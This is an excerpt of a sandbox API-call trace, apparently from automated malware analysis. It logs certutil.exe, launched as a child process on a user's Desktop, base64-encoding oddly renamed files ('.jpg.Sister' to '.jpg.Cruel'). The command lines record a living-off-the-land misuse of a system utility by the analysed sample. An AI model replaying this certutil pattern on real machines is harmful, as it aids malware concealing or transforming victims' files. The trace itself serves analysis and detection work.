(uFlags=0x0, uBytes=0x12) returned 0x15552d1b530 [0215.334] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x15552d138d0 [0215.334] LocalFree (hMem=0x15552d1b530) returned 0x0 [0215.334] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x15552d09fe0 [0215.334] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x15552d14320 [0215.334] LocalFree (hMem=0x15552d09fe0) returned 0x0 [0215.334] LocalFree (hMem=0x15552d138d0) returned 0x0 [0215.335] LocalFree (hMem=0x0) returned 0x0 [0215.335] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0215.335] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0215.335] GetCommandLineW () returned="certutil -encode \"3Pvsa95E4Bhj9.jpg.Sister\" \"3Pvsa95E4Bhj9.jpg.Cruel\"" [0215.336] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x15552d1b7d0 [0215.336] GetSystemTime (in: lpSystemTime=0x324ae7f930 | out: lpSystemTime=0x324ae7f930*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x31, wMilliseconds=0x36c)) [0215.336] SystemTimeToFileTime (in: lpSystemTime=0x324ae7f930, lpFileTime=0x324ae7f928 | out: lpFileTime=0x324ae7f928) returned 1 [0215.336] FileTimeToLocalFileTime (in: lpFileTime=0x324ae7f928, lpLocalFileTime=0x324ae7f8f0 | out: lpLocalFileTime=0x324ae7f8f0) returned 1 [0215.336] FileTimeToSystemTime (in: lpFileTime=0x324ae7f8f0, lpSystemTime=0x324ae7f660 | out: lpSystemTime=0x324ae7f660) returned 1 [0215.336] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x324ae7f660, lpFormat=0x0, lpDateStr=0x324ae7f770, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0215.336] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x324ae7f660, lpFormat=0x0, lpTimeStr=0x324ae7f670, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0215.336] _vsnwprintf (in: _Buffer=0x324ae7f67e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x324ae7f648 | out: _Buffer=" 49.876s") returned 8 [0215.336] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x15552d1ddf0 [0215.336] SetLastError (dwErrCode=0x80070716) [0215.336] _vsnwprintf (in: _Buffer=0x324ae7f6f8, _BufferCount=0xb, _Format="%d", _ArgList=0x324ae7f6e8 | out: _Buffer="948") returned 3 [0215.336] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x324ae7f4b0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0215.337] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x15552d1b2d0 [0215.337] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x15552d146f0 [0215.337] LocalFree (hMem=0x15552d1ddf0) returned 0x0 [0215.337] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x324ae7f9a0 | out: lpSystemTimeAsFileTime=0x324ae7f9a0*(dwLowDateTime=0xaaf5ad40, dwHighDateTime=0x1d6141f)) [0215.337] GetLocalTime (in: lpSystemTime=0x324ae7f9d8 | out: lpSystemTime=0x324ae7f9d8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x31, wMilliseconds=0x36d)) [0215.337] SystemTimeToFileTime (in: lpSystemTime=0x324ae7f9d8, lpFileTime=0x324ae7f9b0 | out: lpFileTime=0x324ae7f9b0) returned 1 [0215.337] CompareFileTime (lpFileTime1=0x324ae7f9b0, lpFileTime2=0x324ae7f9a0) returned 1 [0215.337] _vsnwprintf (in: _Buffer=0x324ae7f9e8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x324ae7f978 | out: _Buffer="GMT + 2.00") returned 10 [0215.337] LocalFree (hMem=0x15552d1b7d0) returned 0x0 [0215.338] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcc9760000 [0215.338] FindResourceW (hModule=0x7ffcc9760000, lpName=0x1, lpType=0x10) returned 0x7ffcc9820090 [0215.338] LoadResource (hModule=0x7ffcc9760000, hResInfo=0x7ffcc9820090) returned 0x7ffcc98200b0 [0215.338] LockResource (hResData=0x7ffcc98200b0) returned 0x7ffcc98200b0 [0215.338] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0215.338] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x324ae7fa18 | out: _Buffer="10.0.15063.447") returned 14 [0215.338] GetACP () returned 0x4e4 [0215.338] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0215.338] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x15552d1b310 [0215.338] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x15552d1b310, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0215.338] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x15552d1e070 [0215.338] _vsnwprintf (in: _Buffer=0x15552d1e070, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x324ae7fa68 | out: _Buffer="10.0.15063.447 retail") returned 21 [0215.338] LocalFree (hMem=0x15552d1b310) returned 0x0 [0215.338] LocalFree (hMem=0x0) returned 0x0 [0215.338] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0215.339] GetACP () returned 0x4e4 [0215.339] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0215.339] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x15552d1b810 [0215.339] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x15552d1b810, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0215.339] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x15552d1dff0 [0215.339] _vsnwprintf (in: _Buffer=0x15552d1dff0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x324ae7fa68 | out: _Buffer="10.0.15063.447 retail") returned 21 [0215.339] LocalFree (hMem=0x15552d1b810) returned 0x0 [0215.339] LocalFree (hMem=0x0) returned 0x0 [0215.339] GetACP () returned 0x4e4 [0215.339] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0215.339] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x15552d1b5b0 [0215.339] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x15552d1b5b0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0215.339] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x15552d1dfb0 [0215.339] _vsnwprintf (in: _Buffer=0x15552d1dfb0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x324ae7fa98 | out: _Buffer="10.0.15063.447 retail") returned 21 [0215.339] LocalFree (hMem=0x15552d1b5b0) returned 0x0 [0215.339] LocalFree (hMem=0x15552d1e070) returned 0x0 [0215.339] LocalFree (hMem=0x15552d1dff0) returned 0x0 [0215.339] LocalFree (hMem=0x15552d1dfb0) returned 0x0 [0215.339] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0215.340] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0215.340] GetStockObject (i=0) returned 0x900010 [0215.340] RegisterClassW (lpWndClass=0x324ae7fbc0) returned 0xc1a2 [0215.340] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1302be [0215.358] NtdllDefWindowProc_W () returned 0x0 [0215.358] NtdllDefWindowProc_W () returned 0x1 [0215.365] NtdllDefWindowProc_W () returned 0x0 [0215.375] UpdateWindow (hWnd=0x1302be) returned 1 [0215.375] PostMessageW (hWnd=0x1302be, Msg=0x400, wParam=0x0, lParam=0x15552d0217e) returned 1 [0215.376] GetMessageW (in: lpMsg=0x324ae7fc10, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x324ae7fc10) returned 1 [0215.376] TranslateMessage (lpMsg=0x324ae7fc10) returned 0 [0215.376] DispatchMessageW (lpMsg=0x324ae7fc10) returned 0x0 [0215.376] NtdllDefWindowProc_W () returned 0x0 [0215.376] GetMessageW (in: lpMsg=0x324ae7fc10, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x324ae7fc10) returned 1 [0215.376] TranslateMessage (lpMsg=0x324ae7fc10) returned 0 [0215.376] DispatchMessageW (lpMsg=0x324ae7fc10) returned 0x0 [0215.376] LocalAlloc (uFlags=0x0, uBytes=0x7a) returned 0x15552d04400 [0215.376] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x15552d08540 [0215.376] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0215.376] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0215.377] SetLastError (dwErrCode=0x80070716) [0215.377] _vsnwprintf (in: _Buffer=0x324ae7f618, _BufferCount=0xb, _Format="%d", _ArgList=0x324ae7f608 | out: _Buffer="465") returned 3 [0215.377] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x324ae7f3d0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0215.377] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x15552d13cc0 [0215.377] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0215.377] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0215.377] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x324ae7f3b0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0215.377] GetLastError () returned 0xcb [0215.377] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0215.377] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0215.377] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0215.377] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0215.377] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0215.377] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0215.377] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0215.378] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0215.378] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0215.378] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0215.378] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0215.378] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0215.378] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0215.378] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0215.378] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0215.378] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0215.378] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0215.378] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0215.378] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0215.378] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0215.378] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0215.378] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x324ae7f078 | out: phkResult=0x324ae7f078*=0x23c) returned 0x0 [0215.378] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x15552d05a40 [0215.378] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x324ae7f5e8, lpData=0x324ae7f618, lpcbData=0x324ae7f5e0*=0x4 | out: lpType=0x324ae7f5e8*=0x0, lpData=0x324ae7f618*=0x0, lpcbData=0x324ae7f5e0*=0x4) returned 0x2 [0215.378] LocalFree (hMem=0x15552d05a40) returned 0x0 [0215.378] RegCloseKey (hKey=0x23c) returned 0x0 [0215.379] LocalFree (hMem=0x0) returned 0x0 [0215.379] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x15552d2c7b0 [0215.393] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0215.393] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0215.393] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0215.394] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0215.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0215.394] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x15552d27d10 [0215.394] GetComputerNameW (in: lpBuffer=0x15552d27d10, nSize=0x324ae7f5e0 | out: lpBuffer="NQDPDE", nSize=0x324ae7f5e0) returned 1 [0215.395] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x324ae7f5b0 | out: lpBuffer=0x0, nSize=0x324ae7f5b0) returned 0 [0215.395] GetLastError () returned 0xea [0215.395] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x15552d1b8b0 [0215.395] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x15552d1b8b0, nSize=0x324ae7f5b0 | out: lpBuffer="NQdPdE", nSize=0x324ae7f5b0) returned 1 [0215.395] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0215.398] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x15552d318f0, cbCertEncoded=0x4ea8) returned 0x0 [0215.401] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x15552d318f0, cbCrlEncoded=0x4ea8) returned 0x0 [0215.401] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x15552d318f0, cbEncoded=0x4ea8, dwFlags=0x8000, pDecodePara=0x324ae7f490, pvStructInfo=0x324ae7f520, pcbStructInfo=0x324ae7f514 | out: pvStructInfo=0x324ae7f520, pcbStructInfo=0x324ae7f514) returned 0 [0215.401] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x15552d318f0, cbEncoded=0x4ea8, dwFlags=0x8000, pDecodePara=0x324ae7f490, pvStructInfo=0x324ae7f520, pcbStructInfo=0x324ae7f514 | out: pvStructInfo=0x324ae7f520, pcbStructInfo=0x324ae7f514) returned 0 [0215.401] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x15552d318f0, cbEncoded=0x4ea8, dwFlags=0x8000, pDecodePara=0x324ae7f490, pvStructInfo=0x324ae7f520, pcbStructInfo=0x324ae7f514 | out: pvStructInfo=0x324ae7f520, pcbStructInfo=0x324ae7f514) returned 0 [0215.401] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x15552d11da0 [0215.411] CryptMsgUpdate (hCryptMsg=0x15552d11da0, pbData=0x15552d318f0, cbData=0x4ea8, fFinal=1) returned 0 [0215.411] GetLastError () returned 0x8009310b [0215.411] CryptMsgClose (hCryptMsg=0x15552d11da0) returned 1 [0215.411] GetFileAttributesExW (in: lpFileName="3Pvsa95E4Bhj9.jpg.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\3pvsa95e4bhj9.jpg.sister"), fInfoLevelId=0x0, lpFileInformation=0x324ae7f540 | out: lpFileInformation=0x324ae7f540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ca0b80, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xb5f66820, ftLastAccessTime.dwHighDateTime=0x1d5e914, ftLastWriteTime.dwLowDateTime=0xb5f66820, ftLastWriteTime.dwHighDateTime=0x1d5e914, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8)) returned 1 [0215.411] _vsnwprintf (in: _Buffer=0x324ae7f548, _BufferCount=0xb, _Format="%d", _ArgList=0x324ae7f538 | out: _Buffer="359") returned 3 [0215.411] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x324ae7f300, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0215.411] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x15552d27800 [0215.411] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.411] _vsnwprintf (in: _Buffer=0x324ae7e530, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x324ae7f588 | out: _Buffer="Input Length = 20136") returned 20 [0215.411] GetFileType (hFile=0x50) returned 0x2 [0215.412] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x324ae7e530*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x324ae7e4e4, lpReserved=0x0 | out: lpBuffer=0x324ae7e530*, lpNumberOfCharsWritten=0x324ae7e4e4*=0x14) returned 1 [0215.414] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.414] _vsnwprintf (in: _Buffer=0x324ae7e530, _BufferCount=0x1ff, _Format="\n", _ArgList=0x324ae7f588 | out: _Buffer="\n") returned 1 [0215.414] GetFileType (hFile=0x50) returned 0x2 [0215.414] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x324ae7e530*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x324ae7e4e4, lpReserved=0x0 | out: lpBuffer=0x324ae7e530*, lpNumberOfCharsWritten=0x324ae7e4e4*=0x1) returned 1 [0215.429] GetFileAttributesExW (in: lpFileName="3Pvsa95E4Bhj9.jpg.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\3pvsa95e4bhj9.jpg.cruel"), fInfoLevelId=0x0, lpFileInformation=0x324ae7f540 | out: lpFileInformation=0x324ae7f540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab027e28, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xab027e28, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xab03a472, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x6c60)) returned 1 [0215.429] _vsnwprintf (in: _Buffer=0x324ae7f548, _BufferCount=0xb, _Format="%d", _ArgList=0x324ae7f538 | out: _Buffer="361") returned 3 [0215.429] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x324ae7f300, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0215.429] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x15552d27a40 [0215.429] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.429] _vsnwprintf (in: _Buffer=0x324ae7e530, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x324ae7f588 | out: _Buffer="Output Length = 27744") returned 21 [0215.429] GetFileType (hFile=0x50) returned 0x2 [0215.429] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x324ae7e530*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x324ae7e4e4, lpReserved=0x0 | out: lpBuffer=0x324ae7e530*, lpNumberOfCharsWritten=0x324ae7e4e4*=0x15) returned 1 [0215.430] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.430] _vsnwprintf (in: _Buffer=0x324ae7e530, _BufferCount=0x1ff, _Format="\n", _ArgList=0x324ae7f588 | out: _Buffer="\n") returned 1 [0215.430] GetFileType (hFile=0x50) returned 0x2 [0215.430] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x324ae7e530*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x324ae7e4e4, lpReserved=0x0 | out: lpBuffer=0x324ae7e530*, lpNumberOfCharsWritten=0x324ae7e4e4*=0x1) returned 1 [0215.437] LocalFree (hMem=0x15552d318f0) returned 0x0 [0215.438] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0215.438] _vsnwprintf (in: _Buffer=0x324ae7f5a8, _BufferCount=0xb, _Format="%d", _ArgList=0x324ae7f598 | out: _Buffer="2022") returned 4 [0215.438] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x324ae7f360, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0215.438] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x15552d08d20 [0215.438] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.438] _vsnwprintf (in: _Buffer=0x324ae7e590, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x324ae7f5e8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0215.438] GetFileType (hFile=0x50) returned 0x2 [0215.438] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x324ae7e590*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x324ae7e544, lpReserved=0x0 | out: lpBuffer=0x324ae7e590*, lpNumberOfCharsWritten=0x324ae7e544*=0x31) returned 1 [0215.438] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.439] _vsnwprintf (in: _Buffer=0x324ae7e590, _BufferCount=0x1ff, _Format="\n", _ArgList=0x324ae7f5e8 | out: _Buffer="\n") returned 1 [0215.439] GetFileType (hFile=0x50) returned 0x2 [0215.439] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x324ae7e590*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x324ae7e544, lpReserved=0x0 | out: lpBuffer=0x324ae7e590*, lpNumberOfCharsWritten=0x324ae7e544*=0x1) returned 1 [0215.443] LocalFree (hMem=0x0) returned 0x0 [0215.443] LocalFree (hMem=0x15552d08540) returned 0x0 [0215.443] LocalFree (hMem=0x15552d04400) returned 0x0 [0215.443] SetLastError (dwErrCode=0x80070716) [0215.443] _vsnwprintf (in: _Buffer=0x324ae7f618, _BufferCount=0xb, _Format="%d", _ArgList=0x324ae7f608 | out: _Buffer="511") returned 3 [0215.443] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x324ae7f3d0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0215.443] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x15552d27ce0 [0215.444] PostQuitMessage (nExitCode=0) [0215.444] GetMessageW (in: lpMsg=0x324ae7fc10, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x324ae7fc10) returned 0 [0215.444] LocalFree (hMem=0x15552d1b8b0) returned 0x0 [0215.444] LocalFree (hMem=0x15552d27d10) returned 0x0 [0215.444] LocalFree (hMem=0x0) returned 0x0 [0215.444] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0215.444] GetLastError () returned 0x7e [0215.446] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0215.446] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0215.447] DllMain () returned 0x1 [0215.447] LocalFree (hMem=0x15552d1b2d0) returned 0x0 [0215.447] LocalFree (hMem=0x15552d13cc0) returned 0x0 [0215.447] LocalFree (hMem=0x15552d27800) returned 0x0 [0215.447] LocalFree (hMem=0x15552d27a40) returned 0x0 [0215.447] LocalFree (hMem=0x15552d08d20) returned 0x0 [0215.447] LocalFree (hMem=0x15552d27ce0) returned 0x0 [0215.447] LocalFree (hMem=0x15552d146f0) returned 0x0 [0215.447] LocalFree (hMem=0x15552d14320) returned 0x0 [0215.447] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0215.447] GetLastError () returned 0x7e [0215.447] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0215.447] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0215.448] DllMain () returned 0x1 [0215.448] exit (_Code=0) Thread: id = 39 os_tid = 0xd50 Process: id = "11" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x23cb1000" os_pid = "0xcf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"45AyVVfixDb.avi.Sister\" \"45AyVVfixDb.avi.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 40 os_tid = 0xd40 [0216.554] GetStartupInfoW (in: lpStartupInfo=0xfafe48fd90 | out: lpStartupInfo=0xfafe48fd90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"45AyVVfixDb.avi.Sister\" \"45AyVVfixDb.avi.Cruel\"", dwX=0x0, dwY=0x1, 